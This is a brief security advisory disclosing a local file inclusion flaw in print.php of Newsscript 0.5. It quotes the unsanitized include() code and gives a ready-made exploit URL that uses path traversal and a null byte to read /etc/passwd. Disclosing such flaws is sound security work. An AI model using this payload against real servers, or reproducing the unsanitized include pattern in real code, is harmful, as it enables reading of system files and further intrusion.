Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability
# Subject:
--- "Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability "
# Vulnerable version:
--- "Newsscript version 0.5"
# Vendor URL:
--- Emaill - mail@xxxxxxxxxxxxxxxxxxxxx
--- Website - http://webmaster-journal.com
# Available in:
---http://www.comscripts.com/scripts/php.wm-news.203.html
# Vulnerability:
--- Vulnerable code in print/print.php
--- $ide var is not sanitized and can be used to include files from local
resources
--- 1 <html>
--- 2 <head>
--- 3 <?
--- 4 $file_name = "../".$ide.".txt";
--- 5 ?>
---
---
--- 27 include($file_name);
# Exploit:
--- http://localhost/newscript/print/print.php?ide=../../../../etc/passwd%00
# Discovered By:
--- Daftrix[at]Gmail.com
--- Daftrix Security Investigations
--- http://www.daftrix.com